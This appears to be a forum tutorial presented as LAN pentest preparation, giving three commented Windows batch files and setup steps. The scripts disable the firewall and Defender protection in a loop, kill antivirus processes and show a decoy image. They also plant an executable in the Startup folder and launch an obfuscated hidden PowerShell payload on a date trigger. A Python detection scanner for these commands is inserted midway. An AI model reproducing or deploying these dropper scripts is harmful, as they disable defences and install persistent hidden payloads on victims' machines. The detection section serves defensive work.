23. Lan Pentest Preparing Payload With Windows 7
----
LAN & WLAN Pentests: a closer look at preparing the payloads. The commands of the 3 .bat files are explained within the video.
af.bat Contents & Rem comments: Explanation of Commands.
=*=
- Code:
@echo off
Rem Turns off Echo
if not DEFINED IS_MINIMIZED set IS_MINIMIZED=1 && start "" /min "%~dpnx0" %* && exit
Rem starts command prompt in minimized mode,
Rem this command probably isn't necessary,
Rem since we will make the entire thing invisible later
Rem but why not?
taskkill /im f1.exe /f
Rem kill process f1.exe forcefully.
timeout /t 01 > nul
Rem waits 1 second, without printing anything with nul.
start "" "%appdata%\zombie.png"
Rem starts a program or file, in this case a picture.
netsh advfirewall set allprofiles state off 2> nul
Rem sets the Windows 10 firewall to off if this
Rem program is run in Administrator mode.
powershell.exe /c "Set-MpPreference -DisableRealtimeMonitoring $true" 2> nul
Rem Disables Windows Defender real-time protection.
timeout /t 10 > nul
Rem waits 10 seconds, then repeats.
Rem If the program is not run as administrator
Rem this portion will just print an error, but
Rem since it's redirected to nul, it shouldn't print anything.
Rem Besides, we will make this entire thing invisible
Rem so nothing seems to matter; it's just extra notes.
netsh advfirewall set allprofiles state off 2> nul
powershell.exe /c "Set-MpPreference -DisableRealtimeMonitoring $true" 2> nul
timeout /t 10 > nul
netsh advfirewall set allprofiles state off 2> nul
powershell.exe /c "Set-MpPreference -DisableRealtimeMonitoring $true" 2> nul
timeout /t 10 > nul
netsh advfirewall set allprofiles state off 2> nul
powershell.exe /c "Set-MpPreference -DisableRealtimeMonitoring $true" 2> nul
timeout /t 10 > nul
netsh advfirewall set allprofiles state off 2> nul
powershell.exe /c "Set-MpPreference -DisableRealtimeMonitoring $true" 2> nul
timeout /t 10 > nul
netsh advfirewall set allprofiles state off 2> nul
powershell.exe /c "Set-MpPreference -DisableRealtimeMonitoring $true" 2> nul
timeout /t 10 > nul
netsh advfirewall set allprofiles state off 2> nul
powershell.exe /c "Set-MpPreference -DisableRealtimeMonitoring $true" 2> nul
timeout /t 10 > nul
netsh advfirewall set allprofiles state off 2> nul
powershell.exe /c "Set-MpPreference -DisableRealtimeMonitoring $true" 2> nul
timeout /t 10 > nul
netsh advfirewall set allprofiles state off 2> nul
powershell.exe /c "Set-MpPreference -DisableRealtimeMonitoring $true" 2> nul
timeout /t 10 > nul
netsh advfirewall set allprofiles state off 2> nul
powershell.exe /c "Set-MpPreference -DisableRealtimeMonitoring $true" 2> nul
timeout /t 10 > nul
Rem After approximately 1 minute and 40 seconds of
Rem Repeatedly disabling protection
"%appdata%\f1.exe" 2> nul
Rem Starts "f1.exe" silently from within this actual
Rem Command Prompt window.
Rem There is no start command before it,
Rem so this program is done running from this point
Rem and it should not be able to run any commands below
Rem this point.
exit
Rem Just in case it did run anything else,
Rem it will exit itself.
f1.bat Contents & Rem comments: Explanation of Commands.
=*=
- Code:
@echo off
taskkill /im powershell.exe /f 2> nul
Rem Turns echo off, kills the payload's
Rem process, powershell.exe, if it's running.
timeout /t 02
Rem waits 2 seconds
move "%appdata%\f.exe" "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\f.exe"
Rem Moves f.exe to the user's Startup folder.
:Begin
Rem Beginning Block
set t=%date:~4,5%
Rem Sets the variable "t" to the current date of the PC (a 5-character slice of %date%).
if "%t%"=="03/02" goto :A
Rem If the date matches month 3, day 2, goto block A.
if not "%t%"=="03/02" goto :B
Rem If it doesn't match month 3, day 2, goto block B.
timeout /t 02 > nul
Rem Waits 2 seconds
:A
Rem Beginning of Block A.
powershell -w 1 -C "sv x -;sv ZO ec;sv h ((gv x).value.toString()+(gv ZO).value.toString());powershell (gv h).value.toString() 'INSERT-HERE'" > nul
exit
Rem Starts the Payload.
:B
Rem Beginning of Block B.
timeout /t 05
Rem Waits 5 seconds.
start "" "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\f.exe" 2> nul
Rem starts f.exe
timeout /t 05
Rem Waits 5 seconds; the program will exit itself after
Rem completing all commands.
f.bat Contents & Rem comments: Explanation of Commands.
=*=
- Code:
@echo off
Rem Turns echo off.
taskkill /im f1.exe /f 2> nul
Rem Kills the process f1.exe forcefully, redirected to nul
Rem so it doesn't print anything when it kills it.
taskkill /im powershell.exe /f
Rem kills powershell.exe forcefully.
timeout /t 04 > nul
Rem waits 4 seconds.
del "%appdata%\f1.exe" /q /s /f 2> nul
Rem Deletes f1.exe, which is the payload .exe.
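The three scripts above each touch a different defensive control: af.bat turns off the firewall profiles and Defender real-time protection in a loop, f1.bat gates execution on the system date and copies an executable into the per-user Startup folder, and f.bat kills processes and cleans up. As an added defender-side example (this is not code from the original post), the Python below scans text lines, either the contents of a .bat file or the command-line field of process-creation events, for exactly those commands and reports which control each line targets and how often it recurs. The sample input is constructed from the commands shown on this page; the rule names, the assumption that the input arrives one command per line, and the extra antivirus process names msmpeng.exe and mssense.exe are mine.

```python
"""Triage scanner for the batch techniques explained above (added example).

Input: an iterable of text lines, e.g. a .bat file read line by line, or the
CommandLine field of Windows Security 4688 / Sysmon Event ID 1 records
(the event-to-line extraction is assumed, not shown here).
Output: one Finding per matching line, plus per-rule counts so that the
"repeat the same disable command ten times" pattern of af.bat is visible.
"""
import re
from collections import Counter
from dataclasses import dataclass


@dataclass(frozen=True)
class Finding:
    line_no: int   # 1-based line within the scanned input
    rule: str      # rule name from RULES
    impact: str    # what a hit means for the host's defences
    text: str      # the offending line, stripped


# (rule name, pattern, impact). Patterns are deliberately narrow: they
# describe the commands on this page, not every possible variant.
RULES = [
    ("firewall_disabled",
     re.compile(r"netsh\s+advfirewall\s+set\s+\w+\s+state\s+off", re.I),
     "Windows Firewall turned off for one or more profiles"),
    ("defender_realtime_disabled",
     re.compile(r"Set-MpPreference\b.*-DisableRealtimeMonitoring\s+\$?true", re.I),
     "Defender real-time protection turned off"),
    ("security_process_killed",
     # msseces.exe is named on the page; msmpeng/mssense are assumed extras.
     re.compile(r"taskkill\b.*/im\s+(msseces|msmpeng|mssense)\.exe", re.I),
     "Antivirus process terminated"),
    ("startup_folder_persistence",
     re.compile(r"\\Start Menu\\Programs\\Startup\\", re.I),
     "File placed in the per-user Startup folder (runs at next logon)"),
    ("date_trigger",
     re.compile(r"%date:~\d+,\d+%", re.I),
     "Execution gated on the system date (logic-bomb style trigger)"),
    ("hidden_powershell",
     # -w is short for -WindowStyle; 1 means Hidden.
     re.compile(r"powershell(\.exe)?\s+.*-w(indowstyle)?\s+1\b", re.I),
     "PowerShell launched with a hidden window"),
    ("stderr_suppressed",
     re.compile(r"2>\s*nul", re.I),
     "Error output discarded (hides failed attempts from the console)"),
]


def scan_lines(lines):
    """Return a list of Finding for every rule that matches each line."""
    findings = []
    for no, line in enumerate(lines, start=1):
        for name, pattern, impact in RULES:
            if pattern.search(line):
                findings.append(Finding(no, name, impact, line.strip()))
    return findings


def rule_counts(findings):
    """Map rule name -> number of lines it fired on (0 for rules that did not)."""
    counts = Counter(f.rule for f in findings)
    return {name: counts.get(name, 0) for name, _, _ in RULES}


def impacted_controls(findings):
    """Sorted, de-duplicated list of the controls the scanned script touches."""
    return sorted({f.rule for f in findings})


# Constructed sample: a condensed mix of af.bat, f1.bat and the taskkill
# from the preparation steps, two of the ten disable repetitions kept.
SAMPLE_BAT = """@echo off
if not DEFINED IS_MINIMIZED set IS_MINIMIZED=1 && start "" /min "%~dpnx0" %* && exit
taskkill /im msseces.exe /f
start "" "%appdata%\\zombie.png"
netsh advfirewall set allprofiles state off 2> nul
powershell.exe /c "Set-MpPreference -DisableRealtimeMonitoring $true" 2> nul
timeout /t 10 > nul
netsh advfirewall set allprofiles state off 2> nul
powershell.exe /c "Set-MpPreference -DisableRealtimeMonitoring $true" 2> nul
move "%appdata%\\f.exe" "%appdata%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\f.exe"
set t=%date:~4,5%
if "%t%"=="03/02" goto :A
powershell -w 1 -C "sv x -;sv ZO ec" > nul
""".splitlines()


if __name__ == "__main__":
    found = scan_lines(SAMPLE_BAT)
    for f in found:
        print(f"line {f.line_no:>2} [{f.rule}] {f.impact}: {f.text}")
    print("controls touched:", impacted_controls(found))
    print("per-rule counts:", rule_counts(found))
```

The counts matter as much as the hits: a single `netsh advfirewall ... off` can be an administrator's mistake, but the same disable command repeated every ten seconds, followed by a Startup-folder write and a date check, is the pattern this post describes and is worth an alert on its own.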
I prefer to use Windows 7 vs. Windows 10 to prepare the Payload.
1. Search Windows for Microsoft Security Essentials (that's my virus protector within the video) and set your real-time protection to Off.
2. Open the Command Prompt and enter the following command, which will kill your GUI explorer, kill the Microsoft Security Essentials process, then restart your GUI file explorer: taskkill /im explorer.exe /f & taskkill /im msseces.exe /f & explorer.exe
3. Plug in your USB stick with the Payload on it.
4. I have the 3 .bat files' code contents in this forum post, under the "code" sections; find the 3 .bat files I use in the video, then follow the instructions within the video carefully. Below are the contents of each .bat file, and the names I gave them within the video.
5. You will need your own payload, your own icon file, and your own zombie.PNG image in order to use the below files for a Pentest on your own machine.
6. Keep in mind, for the exe files that I created, that the one exe that runs as administrator is for Windows 10, and the one that runs without administrator privileges is for Windows 7.
af.bat file contents. This file will be the first & main file, which will eventually contain all of the other exe files that we create using Bat To Exe; it will also be in charge of disabling protection, or bypassing it, on Windows 7 64-bit systems. This will not work, however, on 32-bit Windows 7 systems.
=*=
- Code:
@echo off
if not DEFINED IS_MINIMIZED set IS_MINIMIZED=1 && start "" /min "%~dpnx0" %* && exit
taskkill /im f1.exe /f
timeout /t 01 > nul
start "" "%appdata%\zombie.png"
netsh advfirewall set allprofiles state off 2> nul
powershell.exe /c "Set-MpPreference -DisableRealtimeMonitoring $true" 2> nul
timeout /t 10 > nul
netsh advfirewall set allprofiles state off 2> nul
powershell.exe /c "Set-MpPreference -DisableRealtimeMonitoring $true" 2> nul
timeout /t 10 > nul
netsh advfirewall set allprofiles state off 2> nul
powershell.exe /c "Set-MpPreference -DisableRealtimeMonitoring $true" 2> nul
timeout /t 10 > nul
netsh advfirewall set allprofiles state off 2> nul
powershell.exe /c "Set-MpPreference -DisableRealtimeMonitoring $true" 2> nul
timeout /t 10 > nul
netsh advfirewall set allprofiles state off 2> nul
powershell.exe /c "Set-MpPreference -DisableRealtimeMonitoring $true" 2> nul
timeout /t 10 > nul
netsh advfirewall set allprofiles state off 2> nul
powershell.exe /c "Set-MpPreference -DisableRealtimeMonitoring $true" 2> nul
timeout /t 10 > nul
netsh advfirewall set allprofiles state off 2> nul
powershell.exe /c "Set-MpPreference -DisableRealtimeMonitoring $true" 2> nul
timeout /t 10 > nul
netsh advfirewall set allprofiles state off 2> nul
powershell.exe /c "Set-MpPreference -DisableRealtimeMonitoring $true" 2> nul
timeout /t 10 > nul
netsh advfirewall set allprofiles state off 2> nul
powershell.exe /c "Set-MpPreference -DisableRealtimeMonitoring $true" 2> nul
timeout /t 10 > nul
netsh advfirewall set allprofiles state off 2> nul
powershell.exe /c "Set-MpPreference -DisableRealtimeMonitoring $true" 2> nul
timeout /t 10 > nul
"%appdata%\f1.exe" 2> nul
exit
f1.bat file contents. This Bat file is the one that should actually contain your Payload, in the 'INSERT-HERE' section under the :A block of text.
=*=
- Code:
@echo off
taskkill /im powershell.exe /f 2> nul
timeout /t 02
move "%appdata%\f.exe" "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\f.exe"
:Begin
set t=%date:~4,5%
if "%t%"=="03/02" goto :A
if not "%t%"=="03/02" goto :B
timeout /t 02 > nul
:A
powershell -w 1 -C "sv x -;sv ZO ec;sv h ((gv x).value.toString()+(gv ZO).value.toString());powershell (gv h).value.toString() 'INSERT-HERE'" > nul
exit
:B
timeout /t 05
start "" "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\f.exe" 2> nul
timeout /t 05
f.bat file contents. This bat file tells Windows to remove the f1.exe file whenever the user restarts the computer.
=*=
- Code:
@echo off
taskkill /im f1.exe /f 2> nul
taskkill /im powershell.exe /f
timeout /t 04 > nul
del "%appdata%\f1.exe" /q /s /f 2> nul